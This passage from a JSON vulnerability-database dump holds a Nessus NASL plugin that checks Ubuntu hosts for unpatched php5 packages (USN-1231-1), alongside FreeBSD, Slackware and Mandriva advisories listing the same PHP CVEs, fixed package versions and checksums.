functions\naddGlob() and addPattern() did not properly check their flag\narguments. This could allow a malicious script author to cause a\ndenial of service via application crash. This issue affected Ubuntu\n10.04 LTS, Ubuntu 10.10, Ubuntu 11.04 and Ubuntu 11.10.\n(CVE-2011-1657)\n\nIt was discovered that the Xend opcode parser in PHP could be\ninterrupted while handling the shift-left, shift-right, and\nbitwise-xor opcodes. This could allow a malicious script author to\nexpose memory contents. This issue affected Ubuntu 10.04 LTS.\n(CVE-2010-1914)\n\nIt was discovered that the strrchr function in PHP could be\ninterrupted by a malicious script, allowing the exposure of memory\ncontents. This issue affected Ubuntu 8.04 LTS. (CVE-2010-2484).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 25, "published": "2011-10-19T00:00:00", "title": "Ubuntu 8.04 LTS / 10.04 LTS / 10.10 / 11.04 / 11.10 : php5 vulnerabilities (USN-1231-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-2484", "CVE-2011-1938", "CVE-2011-2483", "CVE-2011-1657", "CVE-2011-3182", "CVE-2010-1914", "CVE-2011-3267", "CVE-2011-2202"], "modified": "2021-01-02T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:libapache2-mod-php5", "cpe:/o:canonical:ubuntu_linux:11.10", "p-cpe:/a:canonical:ubuntu_linux:php5-cgi", "p-cpe:/a:canonical:ubuntu_linux:php5-cli", "cpe:/o:canonical:ubuntu_linux:11.04", "cpe:/o:canonical:ubuntu_linux:10.04:-:lts", "cpe:/o:canonical:ubuntu_linux:8.04:-:lts", "p-cpe:/a:canonical:ubuntu_linux:php5-common", "cpe:/o:canonical:ubuntu_linux:10.10"], "id": "UBUNTU_USN-1231-1.NASL", "href": "https://www.tenable.com/plugins/nessus/56554", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-1231-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(56554);\n script_version(\"1.11\");\n script_cvs_date(\"Date: 2019/09/19 12:54:27\");\n\n script_cve_id(\"CVE-2010-1914\", \"CVE-2010-2484\", \"CVE-2011-1657\", \"CVE-2011-1938\", \"CVE-2011-2202\", \"CVE-2011-2483\", \"CVE-2011-3182\", \"CVE-2011-3267\");\n script_bugtraq_id(41991, 47950, 48259, 49241, 49249, 49252);\n script_xref(name:\"USN\", value:\"1231-1\");\n\n script_name(english:\"Ubuntu 8.04 LTS / 10.04 LTS / 10.10 / 11.04 / 11.10 : php5 vulnerabilities (USN-1231-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Mateusz Kocielski, Marek Kroemeke and Filip Palian discovered that a\nstack-based buffer overflow existed in the socket_connect function's\nhandling of long pathnames for AF_UNIX sockets. A remote attacker\nmight be able to exploit this to execute arbitrary code; however, the\ndefault compiler options for affected releases should reduce the\nvulnerability to a denial of service. This issue affected Ubuntu 10.04\nLTS, Ubuntu 10.10 and Ubuntu 11.04. (CVE-2011-1938)\n\nKrzysztof Kotowicz discovered that the PHP post handler function does\nnot properly restrict filenames in multipart/form-data POST requests.\nThis may allow remote attackers to conduct absolute path traversal\nattacks and possibly create or overwrite arbitrary files. This issue\naffected Ubuntu 8.04 LTS, Ubuntu 10.04 LTS, Ubuntu 10.10 and Ubuntu\n11.04. (CVE-2011-2202)\n\nIt was discovered that the crypt function for blowfish does not\nproperly handle 8-bit characters. This could make it easier for an\nattacker to discover a cleartext password containing an 8-bit\ncharacter that has a matching blowfish crypt value. This issue\naffected Ubuntu 10.04 LTS, Ubuntu 10.10 and Ubuntu 11.04.\n(CVE-2011-2483)\n\nIt was discovered that PHP did not properly check the return values of\nthe malloc(3), calloc(3) and realloc(3) library functions in multiple\nlocations. This could allow an attacker to cause a denial of service\nvia a NULL pointer dereference or possibly execute arbitrary code.\nThis issue affected Ubuntu 8.04 LTS, Ubuntu 10.04 LTS, Ubuntu 10.10\nand Ubuntu 11.04. (CVE-2011-3182)\n\nMaksymilian Arciemowicz discovered that PHP did not properly implement\nthe error_log function. This could allow an attacker to cause a denial\nof service via an application crash. This issue affected Ubuntu 10.04\nLTS, Ubuntu 10.10, Ubuntu 11.04 and Ubuntu 11.10. (CVE-2011-3267)\n\nMaksymilian Arciemowicz discovered that the ZipArchive functions\naddGlob() and addPattern() did not properly check their flag\narguments. This could allow a malicious script author to cause a\ndenial of service via application crash. This issue affected Ubuntu\n10.04 LTS, Ubuntu 10.10, Ubuntu 11.04 and Ubuntu 11.10.\n(CVE-2011-1657)\n\nIt was discovered that the Xend opcode parser in PHP could be\ninterrupted while handling the shift-left, shift-right, and\nbitwise-xor opcodes. This could allow a malicious script author to\nexpose memory contents. This issue affected Ubuntu 10.04 LTS.\n(CVE-2010-1914)\n\nIt was discovered that the strrchr function in PHP could be\ninterrupted by a malicious script, allowing the exposure of memory\ncontents. This issue affected Ubuntu 8.04 LTS. (CVE-2010-2484).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/1231-1/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libapache2-mod-php5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-cgi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-cli\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-common\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:10.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:10.10\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:11.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:11.10\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:8.04:-:lts\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/05/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/10/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/10/19\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2011-2019 Canonical, Inc. / NASL script (C) 2011-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(8\\.04|10\\.04|10\\.10|11\\.04|11\\.10)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 8.04 / 10.04 / 10.10 / 11.04 / 11.10\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"8.04\", pkgname:\"libapache2-mod-php5\", pkgver:\"5.2.4-2ubuntu5.18\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"php5-cgi\", pkgver:\"5.2.4-2ubuntu5.18\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"php5-cli\", pkgver:\"5.2.4-2ubuntu5.18\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"php5-common\", pkgver:\"5.2.4-2ubuntu5.18\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"libapache2-mod-php5\", pkgver:\"5.3.2-1ubuntu4.10\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"php5-cgi\", pkgver:\"5.3.2-1ubuntu4.10\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"php5-cli\", pkgver:\"5.3.2-1ubuntu4.10\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"php5-common\", pkgver:\"5.3.2-1ubuntu4.10\")) flag++;\nif (ubuntu_check(osver:\"10.10\", pkgname:\"libapache2-mod-php5\", pkgver:\"5.3.3-1ubuntu9.6\")) flag++;\nif (ubuntu_check(osver:\"10.10\", pkgname:\"php5-cgi\", pkgver:\"5.3.3-1ubuntu9.6\")) flag++;\nif (ubuntu_check(osver:\"10.10\", pkgname:\"php5-cli\", pkgver:\"5.3.3-1ubuntu9.6\")) flag++;\nif (ubuntu_check(osver:\"10.10\", pkgname:\"php5-common\", pkgver:\"5.3.3-1ubuntu9.6\")) flag++;\nif (ubuntu_check(osver:\"11.04\", pkgname:\"libapache2-mod-php5\", pkgver:\"5.3.5-1ubuntu7.3\")) flag++;\nif (ubuntu_check(osver:\"11.04\", pkgname:\"php5-cgi\", pkgver:\"5.3.5-1ubuntu7.3\")) flag++;\nif (ubuntu_check(osver:\"11.04\", pkgname:\"php5-cli\", pkgver:\"5.3.5-1ubuntu7.3\")) flag++;\nif (ubuntu_check(osver:\"11.04\", pkgname:\"php5-common\", pkgver:\"5.3.5-1ubuntu7.3\")) flag++;\nif (ubuntu_check(osver:\"11.10\", pkgname:\"libapache2-mod-php5\", pkgver:\"5.3.6-13ubuntu3.2\")) flag++;\nif (ubuntu_check(osver:\"11.10\", pkgname:\"php5-cgi\", pkgver:\"5.3.6-13ubuntu3.2\")) flag++;\nif (ubuntu_check(osver:\"11.10\", pkgname:\"php5-cli\", pkgver:\"5.3.6-13ubuntu3.2\")) flag++;\nif (ubuntu_check(osver:\"11.10\", pkgname:\"php5-common\", pkgver:\"5.3.6-13ubuntu3.2\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libapache2-mod-php5 / php5-cgi / php5-cli / php5-common\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "freebsd": [{"lastseen": "2019-05-29T18:33:57", "bulletinFamily": "unix", "cvelist": ["CVE-2011-1148", "CVE-2011-1938", "CVE-2011-2483", "CVE-2011-2202"], "description": "\nPHP development team reports:\n\nSecurity Enhancements and Fixes in PHP 5.3.7:\n\nUpdated crypt_blowfish to 1.2. (CVE-2011-2483)\nFixed crash in error_log(). Reported by Mateusz\n\t Kocielski\nFixed buffer overflow on overlog salt in crypt().\nFixed bug #54939 (File path injection vulnerability\n\t in RFC1867 File upload filename). Reported by Krzysztof\n\t Kotowicz. (CVE-2011-2202)\nFixed stack buffer overflow in socket_connect().\n\t (CVE-2011-1938)\nFixed bug #54238 (use-after-free in substr_replace()).\n\t (CVE-2011-1148)\n\n\n", "edition": 4, "modified": "2011-08-18T00:00:00", "published": "2011-08-18T00:00:00", "id": "057BF770-CAC4-11E0-AEA3-00215C6A37BB", "href": "https://vuxml.freebsd.org/freebsd/057bf770-cac4-11e0-aea3-00215c6a37bb.html", "title": "php -- multiple vulnerabilities", "type": "freebsd", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:41", "bulletinFamily": "software", "cvelist": ["CVE-2011-1148", "CVE-2011-1938", "CVE-2011-2483", "CVE-2011-2202"], "description": "\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n[slackware-security] php (SSA:2011-237-01)\r\n\r\nNew php packages are available for Slackware 11.0, 12.0, 12.1, 12.2, 13.0,\r\n13.1, 13.37, and -current to fix security issues.\r\n\r\n\r\nHere are the details from the Slackware 13.37 ChangeLog:\r\n+--------------------------+\r\npatches/packages/php-5.3.8-i486-1_slack13.37.txz: Upgraded.\r\n Security fixes vs. 5.3.6 (5.3.7 was not usable):\r\n Updated crypt_blowfish to 1.2. (CVE-2011-2483)\r\n Fixed crash in error_log(). Reported by Mateusz Kocielski\r\n Fixed buffer overflow on overlog salt in crypt().\r\n Fixed bug #54939 (File path injection vulnerability in RFC1867\r\n File upload filename). Reported by Krzysztof Kotowicz. (CVE-2011-2202)\r\n Fixed stack buffer overflow in socket_connect(). (CVE-2011-1938)\r\n Fixed bug #54238 (use-after-free in substr_replace()). (CVE-2011-1148)\r\n For more information, see:\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1148\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1938\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2202\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2483\r\n For those upgrading from PHP 5.2.x, be aware that quite a bit has\r\n changed, and it will very likely not 'drop in', but PHP 5.2.x is not\r\n supported by php.net any longer, so there wasn't a lot of choice\r\n in the matter. We're not able to support a security fork of\r\n PHP 5.2.x here either, so you'll have to just bite the bullet on\r\n this. You'll be better off in the long run. :)\r\n (* Security fix *)\r\n+--------------------------+\r\n\r\n\r\nWhere to find the new packages:\r\n+-----------------------------+\r\n\r\nThanks to the friendly folks at the OSU Open Source Lab\r\n(http://osuosl.org) for donating FTP and rsync hosting\r\nto the Slackware project! :-)\r\n\r\nAlso see the "Get Slack" section on http://slackware.com for\r\nadditional mirror sites near you.\r\n\r\nUpdated package for Slackware 11.0:\r\nftp://ftp.slackware.com/pub/slackware/slackware-11.0/extra/php5/php-5.3.8-i486-1_slack11.0.tgz\r\n\r\nUpdated package for Slackware 12.0:\r\nftp://ftp.slackware.com/pub/slackware/slackware-12.0/patches/packages/php-5.3.8-i486-1_slack12.0.tgz\r\n\r\nUpdated package for Slackware 12.1:\r\nftp://ftp.slackware.com/pub/slackware/slackware-12.1/patches/packages/php-5.3.8-i486-1_slack12.1.tgz\r\n\r\nUpdated package for Slackware 12.2:\r\nftp://ftp.slackware.com/pub/slackware/slackware-12.2/patches/packages/php-5.3.8-i486-1_slack12.2.tgz\r\n\r\nUpdated package for Slackware 13.0:\r\nftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/php-5.3.8-i486-1_slack13.0.txz\r\n\r\nUpdated package for Slackware x86_64 13.0:\r\nftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/php-5.3.8-x86_64-1_slack13.0.txz\r\n\r\nUpdated package for Slackware 13.1:\r\nftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/php-5.3.8-i486-1_slack13.1.txz\r\n\r\nUpdated package for Slackware x86_64 13.1:\r\nftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/php-5.3.8-x86_64-1_slack13.1.txz\r\n\r\nUpdated package for Slackware 13.37:\r\nftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/php-5.3.8-i486-1_slack13.37.txz\r\n\r\nUpdated package for Slackware x86_64 13.37:\r\nftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/php-5.3.8-x86_64-1_slack13.37.txz\r\n\r\nUpdated package for Slackware -current:\r\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/php-5.3.8-i486-1.txz\r\n\r\nUpdated package for Slackware x86_64 -current:\r\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/php-5.3.8-x86_64-1.txz\r\n\r\n\r\nMD5 signatures:\r\n+-------------+\r\n\r\nSlackware 11.0 package:\r\n9c68e64817dc0303a098463f3449d457 php-5.3.8-i486-1_slack11.0.tgz\r\n\r\nSlackware 12.0 package:\r\ne87e96a218cfc61be65c5662dc51af88 php-5.3.8-i486-1_slack12.0.tgz\r\n\r\nSlackware 12.1 package:\r\n83de1f7eee73c4b84c890e39b7a587d6 php-5.3.8-i486-1_slack12.1.tgz\r\n\r\nSlackware 12.2 package:\r\n68995a7d24e2fb0666cab69310f2c2b4 php-5.3.8-i486-1_slack12.2.tgz\r\n\r\nSlackware 13.0 package:\r\nccf32b94bf48fdc5ed96ab5fa80cfd14 php-5.3.8-i486-1_slack13.0.txz\r\n\r\nSlackware x86_64 13.0 package:\r\n8e7fed1682a30dffb25b5ebe5bf2f8d1 php-5.3.8-x86_64-1_slack13.0.txz\r\n\r\nSlackware 13.1 package:\r\n4c9be7c00bb297bad6dd2aeae759f116 php-5.3.8-i486-1_slack13.1.txz\r\n\r\nSlackware x86_64 13.1 package:\r\n4f8f56e6f70a89712d96dac2380d8c85 php-5.3.8-x86_64-1_slack13.1.txz\r\n\r\nSlackware 13.37 package:\r\nc44bb52de43ed2ff2cf00fd4ba5b218a php-5.3.8-i486-1_slack13.37.txz\r\n\r\nSlackware x86_64 13.37 package:\r\n54149726aef87ef3da9b5abe5fe27252 php-5.3.8-x86_64-1_slack13.37.txz\r\n\r\nSlackware -current package:\r\n839c90cc461aad85586cdf5d69a9781e n/php-5.3.8-i486-1.txz\r\n\r\nSlackware x86_64 -current package:\r\n330aeaa4a2bff8723641b208678e3d0b n/php-5.3.8-x86_64-1.txz\r\n\r\n\r\nInstallation instructions:\r\n+------------------------+\r\n\r\nUpgrade the package as root:\r\n# upgradepkg php-5.3.8-i486-1_slack13.37.txz\r\n\r\nThen, restart Apache httpd:\r\n# /etc/rc.d/rc.httpd stop\r\n# /etc/rc.d/rc.httpd start\r\n\r\n\r\n+-----+\r\n\r\nSlackware Linux Security Team\r\nhttp://slackware.com/gpg-key\r\nsecurity@slackware.com\r\n\r\n+------------------------------------------------------------------------+\r\n| To leave the slackware-security mailing list: |\r\n+------------------------------------------------------------------------+\r\n| Send an email to majordomo@slackware.com with this text in the body of |\r\n| the email message: |\r\n| |\r\n| unsubscribe slackware-security |\r\n| |\r\n| You will get a confirmation message back containing instructions to |\r\n| complete the process. Please do not reply to this email address. |\r\n+------------------------------------------------------------------------+\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.11 (GNU/Linux)\r\n\r\niEYEARECAAYFAk5WE7oACgkQakRjwEAQIjMo4ACfQEjk63hAFDTcnCrnjl3qmqaT\r\nT3QAn16JTA4XdXMv0IRdnIiklC10PQoO\r\n=M4cG\r\n-----END PGP SIGNATURE-----\r\n", "edition": 1, "modified": "2011-08-27T00:00:00", "published": "2011-08-27T00:00:00", "id": "SECURITYVULNS:DOC:26931", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:26931", "title": "[slackware-security] php (SSA:2011-237-01)", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:09:43", "bulletinFamily": "software", "cvelist": ["CVE-2011-1148", "CVE-2011-1938", "CVE-2011-2483", "CVE-2011-1657", "CVE-2011-2202"], "description": "NULL pointer dereference, ZipArchive mmemroy corruptions.", "edition": 1, "modified": "2011-08-27T00:00:00", "published": "2011-08-27T00:00:00", "id": "SECURITYVULNS:VULN:11879", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:11879", "title": "PHP multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:44", "bulletinFamily": "software", "cvelist": ["CVE-2012-2336", "CVE-2011-1148", "CVE-2012-2335", "CVE-2012-1823", "CVE-2011-1938", "CVE-2011-4885", "CVE-2011-2483", "CVE-2012-0788", "CVE-2012-0830", "CVE-2011-1657", "CVE-2011-3268", "CVE-2011-3182", "CVE-2012-1172", "CVE-2011-4566", "CVE-2011-3267", "CVE-2011-3379", "CVE-2011-2202", "CVE-2012-0831", "CVE-2012-0807"], "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n _______________________________________________________________________\r\n\r\n Mandriva Linux Security Advisory MDVSA-2012:071\r\n http://www.mandriva.com/security/\r\n _______________________________________________________________________\r\n\r\n Package : php\r\n Date : May 10, 2012\r\n Affected: Enterprise Server 5.0\r\n _______________________________________________________________________\r\n\r\n Problem Description:\r\n\r\n This is a bugfix and security advisory that upgrades php to the\r\n latest 5.3.13 version for Mandriva Linux Enterprise 5.2 which resolves\r\n numerous upstream bugs in php. Please refer to the following Mandriva\r\n advisories for further information:\r\n MDVA-2012:004, MDVSA-2011:165, MDVSA-2011:166, MDVSA-2011:180,\r\n MDVSA-2011:197, MDVSA-2012:065, MDVSA-2012:068, MDVSA-2012:068-1.\r\n _______________________________________________________________________\r\n\r\n References:\r\n\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1148\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1657\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1938\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2202\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2483\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3182\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3267\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3268\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3379\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2483\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4566\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4885\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0788\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0807\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0830\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0831\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1172\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1823\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1823\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2335\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2336\r\n http://www.mandriva.com/security/advisories?name=MDVA-2012:004\r\n http://www.mandriva.com/security/advisories?name=MDVSA-2011:165\r\n http://www.mandriva.com/security/advisories?name=MDVSA-2011:166\r\n http://www.mandriva.com/security/advisories?name=MDVSA-2011:180\r\n http://www.mandriva.com/security/advisories?name=MDVSA-2011:197\r\n http://www.mandriva.com/security/advisories?name=MDVSA-2012:065\r\n http://www.mandriva.com/security/advisories?name=MDVSA-2012:068\r\n http://www.mandriva.com/security/advisories?name=MDVSA-2012:068-1\r\n _______________________________________________________________________\r\n\r\n Updated Packages:\r\n\r\n Mandriva Enterprise Server 5:\r\n 7361d218b400b6601eef5465f0c132f1 mes5/i586/apache-mod_php-5.3.13-0.1mdvmes5.2.i586.rpm\r\n 23194f266a0a18c9d49fa7760f6d75f7 mes5/i586/lemon-3.7.4-0.1mdvmes5.2.i586.rpm\r\n ee51be362aff5c90c587650c52e5d874 mes5/i586/libmbfl1-1.1.0-0.1mdvmes5.2.i586.rpm\r\n 0cd89098cc20b5ce8acb14d6f6ddc748 mes5/i586/libmbfl-devel-1.1.0-0.1mdvmes5.2.i586.rpm\r\n dedab7019ea9edfeb929fa521191fe09 mes5/i586/libming1-0.4.4-0.1mdvmes5.2.i586.rpm\r\n 881df3313a40b7113d0b2c4d39349c4a mes5/i586/libming-devel-0.4.4-0.1mdvmes5.2.i586.rpm\r\n a09e59b16f2c4fe4a583b65689f0f308 mes5/i586/libmonetra7-7.0.4-0.1mdvmes5.2.i586.rpm\r\n 1cdd454b9561c94253a4d885a1f34370 mes5/i586/libmonetra-devel-7.0.4-0.1mdvmes5.2.i586.rpm\r\n 90dcdd87fb687327fd687e490be5fc7b mes5/i586/libphp5_common5-5.3.13-0.1mdvmes5.2.i586.rpm\r\n cc8e259df098747e849797194711dff1 mes5/i586/libsphinxclient0-0.9.9-0.1mdvmes5.2.i586.rpm\r\n 716d1d5539c4a4eaac5996c70578107d mes5/i586/libsphinxclient-devel-0.9.9-0.1mdvmes5.2.i586.rpm\r\n b271fe2d863cb99d46f99a20c0cab5d3 mes5/i586/libstemmer0-0-5.1mdvmes5.2.i586.rpm\r\n f08df937c8cbc104c32a0b42f77a2b2d mes5/i586/libstemmer-devel-0-5.1mdvmes5.2.i586.rpm\r\n fc04b1140795dafb3a280100a34e1698 mes5/i586/libxmlrpc-epi0-0.54-0.1mdvmes5.2.i586.rpm\r\n ed22bcef35a1b90090a01d5bdf5c2861 mes5/i586/libxmlrpc-epi-devel-0.54-0.1mdvmes5.2.i586.rpm\r\n 3c70ce8653099b8bede16e1d4b1c854c mes5/i586/libyaz3-3.0.48-0.1mdvmes5.2.i586.rpm\r\n d73a3220c42f40c085c1caa3a1797b9a mes5/i586/libyaz-devel-3.0.48-0.1mdvmes5.2.i586.rpm\r\n 8cd9158f64b8d1345e47485ab28b8f87 mes5/i586/ming-utils-0.4.4-0.1mdvmes5.2.i586.rpm\r\n ec6c990e242c299eb3f250a273298534 mes5/i586/perl-SWF-0.4.4-0.1mdvmes5.2.i586.rpm\r\n c199e39972b4633c025cdb4497f866d5 mes5/i586/php-apc-3.1.10-0.1mdvmes5.2.i586.rpm\r\n 4d7b2a7efea30875044fa27ab621855f mes5/i586/php-apc-admin-3.1.10-0.1mdvmes5.2.i586.rpm\r\n b86186ed13e27f5dde58b58e799f9145 mes5/i586/php-bcmath-5.3.13-0.1mdvmes5.2.i586.rpm\r\n 364fb5e17d6f35aeb212e374f8408236 mes5/i586/php-bz2-5.3.13-0.1mdvmes5.2.i586.rpm\r\n 64367f635bddcdb8f799f30bd56db615 mes5/i586/php-calendar-5.3.13-0.1mdvmes5.2.i586.rpm\r\n 040288301616bfb16436f2e5a341ff9f mes5/i586/php-cgi-5.3.13-0.1mdvmes5.2.i586.rpm\r\n 3c265959950263674c5017eda963117e mes5/i586/php-cli-5.3.13-0.1mdvmes5.2.i586.rpm\r\n 42876a7aead3c2ba20de3b237502d317 mes5/i586/php-ctype-5.3.13-0.1mdvmes5.2.i586.rpm\r\n 9ae84a482bced4724fc5b2719a5f7e74 mes5/i586/php-curl-5.3.13-0.1mdvmes5.2.i586.rpm\r\n fb39ca8bc9b3e70dca9eabeb43f1b5a3 mes5/i586/php-dba-5.3.13-0.1mdvmes5.2.i586.rpm\r\n eb9cd33f04b6b8ce9631dbee6ffdfa1c mes5/i586/php-dbx-1.1.0-30.2mdvmes5.2.i586.rpm\r\n 4a289a7a64702fc7bf9167125f172274 mes5/i586/php-devel-5.3.13-0.1mdvmes5.2.i586.rpm\r\n fc09a56f707392c32ef3aeec9a1bb242 mes5/i586/php-dio-0.0.5-0.1mdvmes5.2.i586.rpm\r\n 521e2447d98a8d37aa7fb2fa35787ef2 mes5/i586/php-doc-5.3.13-0.1mdvmes5.2.i586.rpm\r\n 6e0fed6e1c0b5ee5a11645e4956d345c mes5/i586/php-dom-5.3.13-0.1mdvmes5.2.i586.rpm\r\n 5e9298f4d04acef2d164c52697e911eb mes5/i586/php-eaccelerator-0.9.6.1-0.6mdvmes5.2.i586.rpm\r\n 688d1e19c4955521d7a217bd64b1a3aa mes5/i586/php-eaccelerator-admin-0.9.6.1-0.6mdvmes5.2.i586.rpm\r\n c7ba6857a141dbac85afa4f05cdb65ca mes5/i586/php-enchant-5.3.13-0.1mdvmes5.2.i586.rpm\r\n 0c179177f51deb368800f0c08cedc599 mes5/i586/php-exif-5.3.13-0.1mdvmes5.2.i586.rpm\r\n 39f6318d1367c28e8c0365098e7750e4 